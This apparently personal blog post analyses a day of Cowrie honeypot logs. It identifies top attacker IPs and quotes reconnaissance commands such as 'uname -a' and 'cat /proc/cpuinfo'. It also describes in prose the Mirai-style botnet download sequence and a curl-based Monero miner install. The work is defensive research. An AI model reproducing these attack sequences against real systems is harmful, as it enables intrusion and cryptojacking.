T-pot: Cowrie Honeypot Analysis
Overview
After several days of being up, my tpot saw several attacks. In my previous post, I explained my tpot setup. I will focus on Cowrie honeypot attacks in this post. The cowrie honeypot specifically captures ssh and telnet connections. It logs brute force attacks and shell interaction.
To conduct my analysis I will mostly be using ELK stack, also known as elastic stack, which is built into the tpot platform I am using. Elastic Stack takes data and searches, analyzes and visualizes in real-time. It is made up of three tools, logstash which collects and transforms data, elasticsearch, which searches and analyses data and kibana, which visualizes and manages the data.
Cowrie
I decided to focus on a 24 hr interval that received a lot of traffic, Feb 10,2022 @04:00:00 -> Feb 11,2022 @04:00:00. According to the Kibana dashboard, during this time interval, my Cowrie honeypot received 4,563 attacks, predominantly trying to exploit an ssh vulnerability. The dashboard suggested that most of the attacks were coming from Russia and China. I continued to scroll through the dashboard to see the top 10 attacker source IPs and decided to start my investigation there.
Who are the attackers
I decided to focus on the top 3 attackers in this list as their attack counts were significantly higher than the rest of the list. 116.105.212.31, 116.98.60.69, 116.98.166.90. According to Talosintelligence, they all come from Da Nang, Vietnam, and the network owner is Viettel Corporation. All three have poor reputations and are recognized as having been the origin of a critical amount of spam. All except 116.98.166.90 are recognized on blocklists and classified as attackers.
Attacks:
The username and password tagclouds show the input attempts used in the brute force attacks. Brute forcing is the use of several combinations of passwords to gain unauthorized access to the target system. Several of the passwords attempts are basic and appear on the common rockyou.txt list that comes preinstalled in kali. This is a reminder of the importance of choosing a strong password, one that includes uppercase, lowercase letters and special characters.
Commands
In order to look into commands that may have been run to get into the system, I went over to the discovery dashboard that uses the logstash tool. I filtered out for the cowrie honeypot, and for existing inputs. I grouped different IP addresses based on commands made so that I could best investigate who the attackers were and what they were trying to do. I noticed numerous IP addresses using the same commands, suggesting botnet activity.
Unfamiliar with several of the commands I did a little research, and found that the ‘/ip cloud print’ command targets Microtik routers, that are running RouterOS versions prior to version 6.27. Ultimately the attackers are trying to identify the OS of the device, most likely to decide how to proceed with their attack. The attacker continued to gather information on the honeypot’s system through the use of the commands: ‘ifconfig’, ‘uname -a’, ‘cat /proc/cpuinfo’. Then the attackers searched system process for the word ‘miner’ suggesting that they are looking for cryptominers on the system.Then they sought out specific files.The attacker echo’s ‘hi’ to indicate that it has already identified the honeypot.
I took a look at the next frequent command pattern.
Due to the amount of IP addresses with this series of commands, I am inclined to believe a botnet may be responsible. Busybox was a new term for me so I started off by looking into what it is. Busybox is a software that allows the user to compile commands and other features into a small executable. Such a tool is great for an attacker to get exploits on to your device.
The attackers started off by trying to gain shell access. They ran different commands that could possibly execute a shell, which suggests they weren’t sure which would do it and had to verify. Then sought to display the file system’s storage devices , another way to learn more about the system they were attacking. Tftp and wget, which are commands typically used for downloading, were checked for ability to be executed. They then made a duplicate disk (dd), a copy, with one block of 52 bytes . Then it removed all it’s data from the system.
According to my research this was a known botnet malware. According to VirusTotal, it is associated with mirai malware, infects devices and adds them to their botnet. Botnets are dangerous in that they are often used for denial of service attacks (dos). This attacker started off by trying to change into different directories, then tries to download malicious payloads from a server. It then attempts to open up the permissions of said payloads to make it readable, writable and executable by anyone. Then they recursively remove the files they downloaded.
Upon looking at this command I inferred that the attacker attempted to download a cryptominer on to the system. I found that c3pool is a space that allows miners to pool their processing power over a network to mine XMR( Montero), a popular cryptocurrency. The attacker starts off by changing to the /tmp directory makes a request in silent mode to go, to a site for downloading the miner. Then they overrode all the setting and downloaded what I imagine to be a malicious payload.
I also noted that both the source IP 179.43.187.95, and 179.43.175.170, have been flagged numerous times as malicious on virus total and according to whois rooting from Latin America and not Switzerland, as my collected data suggested. The source machine is likely using a vpn.
Debrief
The first thing that comes to mind as I consider how companies can mitigate risks is they should configure their security groups to restrict access. They should also close ports that are not used. Being that I configured the tpot to be very open, it made for a very vulnerable system. Several brute force attempts took place, so setting a good password policy that requires a strong password would really be beneficial.
Final thoughts
This has been a pretty interesting project and there is still so much more I can do with the data I have found and I intend to. Thank you for reading. Feel free to follow if you like my content.
